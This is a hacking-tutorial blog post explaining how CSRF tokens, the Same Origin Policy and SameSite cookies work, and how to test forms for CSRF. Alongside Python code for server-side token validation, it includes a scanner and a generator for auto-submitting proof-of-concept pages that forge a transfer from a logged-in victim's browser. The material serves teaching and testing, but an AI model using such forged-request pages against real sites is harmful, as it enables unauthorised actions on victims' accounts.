Hacking Tutorials

Cross Site Request Forgery (CSRF) Explained – 2

Hello guys! In the previous article we learned what Cross Site Request Forgery (CSRF) is and how it works. This time we are going to learn how to test for CSRF vulnerabilities.

So let's keep it simple.

Every form that changes state is vulnerable to CSRF unless some security measure is in place.

Yeah, you read that right: any request that changes state (transfers money, changes an email address, deletes a record) and is authenticated only by what the browser attaches automatically, such as a session cookie, can be forged from another site unless the application adds a check that an attacker's page cannot satisfy.
But what kind of security measures?
Well, the most common defence against CSRF is a CSRF token.

What is a CSRF Token and How does it work?

Here's a simple form which submits a value "amount" to the page money.php:

<form action="http://example.com/money.php" method="POST">
  <input type="text" name="amount">
  <input type="submit">
</form>

This form is potentially vulnerable to CSRF: a page controlled by the attacker can contain an identical form, submit it from the victim's browser, and the browser will attach the victim's session cookie to the request.
Now let's add a hidden input which automatically submits a long, random string called a CSRF token.

<form action="http://example.com/money.php" method="POST">
  <input type="hidden" name="_token" value="mc78P887bcPncYhoAdloizdc9njblCb">
  <input type="text" name="amount">
  <input type="submit">
</form>

The token is generated by the server, is unpredictable (a long random value, typically at least 128 bits), is tied to the victim's session and is checked on every state-changing request. Depending on the framework it is issued once per session or fresh on every page load; either way the attacker cannot guess the token that the victim's browser will submit, so a forged request without the right token is rejected.
A CSRF token can also be implemented with a cookie (the "double submit" pattern: the same value is sent as a cookie and as a form field or header, and the server checks that the two match), but most of the time you will find it in a hidden form field as above. Whichever variant is used, the defence only works if the server actually validates the token; a hidden field the server ignores is just decoration, which is why testing means removing or altering the token and resending the request.
If the attacker finds an XSS vulnerability in the website, bypassing the token is a piece of cake: the injected script runs in the site's own origin, so it can read the token from the page and submit it. That is a separate bug, and a CSRF token is not designed to survive XSS. What stops the attacker's own page from reading the token in the first place is the browser's Same Origin Policy (SOP).
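Here is what the token mechanism looks like on the server side, as an added example written for this edit rather than code from the original article: a minimal synchronizer-token implementation for the money.php form above, plus the cookie-based ("double submit") variant mentioned above, in Python using only the standard library. The session dict, SERVER_SECRET and all function names are illustrative assumptions, not any framework's API.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Assumed server-side secret for the cookie-based variant; load it from
# configuration in a real deployment. Generated fresh here so the example runs.
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session: dict) -> str:
    """Synchronizer token: one unguessable value per session, kept server
    side and embedded as a hidden field in every state-changing form."""
    if "_csrf" not in session:
        session["_csrf"] = secrets.token_urlsafe(32)  # 256 random bits
    return session["_csrf"]


def validate_token(session: dict, submitted: Optional[str]) -> bool:
    """Reject when no token is stored, none was submitted, or they differ.
    compare_digest keeps the comparison constant-time."""
    expected = session.get("_csrf")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def cookie_token(session_id: str) -> str:
    """Cookie-based ("double submit") variant: the token is HMAC(secret,
    session id), so the server stores nothing extra. The browser sends it
    back both as a cookie and as a form field; a page on another origin
    cannot read the cookie, so it cannot produce a matching field."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def validate_cookie_token(session_id: str, cookie_value: Optional[str],
                          field_value: Optional[str]) -> bool:
    """Both copies must be present, equal to each other and to the HMAC."""
    if not cookie_value or not field_value:
        return False
    expected = cookie_token(session_id)
    return (hmac.compare_digest(expected.encode(), cookie_value.encode())
            and hmac.compare_digest(cookie_value.encode(), field_value.encode()))


def render_transfer_form(session: dict) -> str:
    """The article's money.php form with the session's token embedded."""
    token = issue_token(session)
    return (
        '<form action="http://example.com/money.php" method="POST">\n'
        f'  <input type="hidden" name="_token" value="{token}">\n'
        '  <input type="text" name="amount">\n'
        '  <input type="submit">\n'
        '</form>'
    )


def handle_transfer(session: dict, form: dict) -> str:
    """Server side of money.php: validate the token before touching money."""
    if not validate_token(session, form.get("_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {form.get('amount')}"


if __name__ == "__main__":
    victim = {}                      # stands in for the victim's session store
    print(render_transfer_form(victim))
    genuine = {"_token": victim["_csrf"], "amount": "100"}
    forged = {"amount": "100"}       # an attacker's page cannot know the token
    print(handle_transfer(victim, genuine))
    print(handle_transfer(victim, forged))
```

Two details matter in practice and are easy to get wrong: the token must be compared with a constant-time function, and a token from a different session (an attacker can always obtain one for their own account) must be rejected, which the session binding above guarantees.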

Same Origin Policy

To understand SOP, think of asking your telecom provider to lock your SIM card: they first confirm that you are the owner before acting, so nobody else can lock it on your behalf.
The browser applies a similar rule to web pages: a script running on a different origin can send a request to your website, but it cannot read the response, your website's cookies or the token embedded in your page. That is what keeps the token secret from the attacker. Always keep in mind that SOP restricts reading, not sending: it does not stop a cross-site HTML form submission, and the browser still attaches the target site's cookies to that submission. That is exactly why CSRF works at all and why the token (or another check) is needed.
SOP is enforced by every browser; a website does not switch it on, so there is no header that tells you it is "in use". What the HTTP headers do tell you is whether the site has relaxed or tightened the picture: Access-Control-Allow-Origin (CORS) headers, especially together with Access-Control-Allow-Credentials: true, let the listed origins read responses, and a SameSite attribute (Lax or Strict) on the Set-Cookie header tells the browser not to attach the session cookie to cross-site requests, which on its own blocks most CSRF.

That's all. Next time you want to check whether a form is vulnerable to CSRF: look at the page source for a token mechanism, confirm that the server really validates it (submit the form with the token removed, emptied, or swapped for one from your own session), and take a look at the HTTP headers for SameSite attributes on the session cookie and for CORS settings.
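Putting those checks together, here is an added example (written for this edit, not code from the original article) in Python that runs them over a constructed HTTP response: it parses the forms, flags which ones carry a token-looking hidden field, reads the SameSite attribute from each Set-Cookie header, reports any Access-Control-Allow-Origin, and generates the auto-submitting proof-of-concept page you would host to confirm a finding in a logged-in browser. The sample response, the form and cookie names, and the token-name heuristic are assumptions made for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample response (not captured from any real site): one POST form
# without a token, one with, and a session cookie that lacks SameSite.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=abc123; Path=/; HttpOnly\r\n"
    "Set-Cookie: theme=dark; Path=/; SameSite=Lax\r\n"
    "\r\n<html><body>\n"
    '<form action="http://example.com/money.php" method="POST">\n'
    '  <input type="text" name="amount">\n  <input type="submit">\n</form>\n'
    '<form action="http://example.com/profile.php" method="POST">\n'
    '  <input type="hidden" name="_token" value="mc78P887bcPncYhoAdloizdc9njblCb">\n'
    '  <input type="text" name="email">\n  <input type="submit">\n</form>\n'
    "</body></html>"
)
# Heuristic field names commonly used for anti-CSRF tokens (an assumption).
TOKEN_NAME_RE = re.compile(r"csrf|xsrf|token|nonce|authenticity", re.I)


class FormParser(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"name": a.get("name"),
                                            "type": (a.get("type") or "text").lower(),
                                            "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def split_response(raw):
    """Raw HTTP response -> (status line, [(lowercased header, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = [(k.strip().lower(), v.strip()) for k, _, v in (l.partition(":") for l in lines)]
    return status, headers, body


def samesite_by_cookie(headers):
    """Map each Set-Cookie name to its SameSite value (None when absent)."""
    out = {}
    for k, v in headers:
        if k == "set-cookie":
            parts = [p.strip() for p in v.split(";")]
            name = parts[0].split("=", 1)[0]
            out[name] = None
            for attr in parts[1:]:
                if attr.lower().startswith("samesite="):
                    out[name] = attr.split("=", 1)[1].strip().capitalize()
    return out


def token_fields(form):
    """Hidden inputs named like a token with a value of 16+ characters."""
    return [i["name"] for i in form["inputs"]
            if i["type"] == "hidden" and i["name"]
            and TOKEN_NAME_RE.search(i["name"]) and len(i["value"]) >= 16]


def assess_response(raw):
    """The checks the article describes: token field per form, SameSite on
    cookies, and whether CORS has been opened up for other origins."""
    _, headers, body = split_response(raw)
    parser = FormParser()
    parser.feed(body)
    for form in parser.forms:
        form["token_fields"] = token_fields(form)
    return {"forms": parser.forms,
            "cookies": samesite_by_cookie(headers),
            "cors_origin": dict(headers).get("access-control-allow-origin")}


def build_poc(form, overrides, drop=()):
    """Attacker-hosted page that auto-submits the form from the victim's
    browser. drop=("_token",) re-tests with the token removed, which is how
    you learn whether the server actually enforces it."""
    rows = []
    for i in form["inputs"]:
        if not i["name"] or i["name"] in drop or i["type"] == "submit":
            continue
        value = html.escape(str(overrides.get(i["name"], i["value"])), quote=True)
        rows.append(f'  <input type="hidden" name="{html.escape(i["name"])}" value="{value}">')
    return ('<html><body onload="document.forms[0].submit()">\n'
            f'<form action="{html.escape(form["action"])}" method="{form["method"]}">\n'
            + "\n".join(rows) + "\n</form></body></html>")
```

Calling assess_response(SAMPLE_RESPONSE) reports the money.php form with no token field, the profile.php form with "_token", PHPSESSID without SameSite and no CORS header; build_poc(report["forms"][0], {"amount": "1000"}) then produces the page that, opened by a logged-in victim, submits the transfer with their cookie attached even though the attacker's page can never read the response. The heuristic only says a token is present: whether the server enforces it is established by resending with drop=("_token",) and watching whether the request still succeeds.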
Keep Learning! Keep Hacking!


About the author


I am Somdev Sangwan, also known as D3V. I am a n00b and I love computers and hacking. I am a Python freak and your friendly neighborhood hacker.
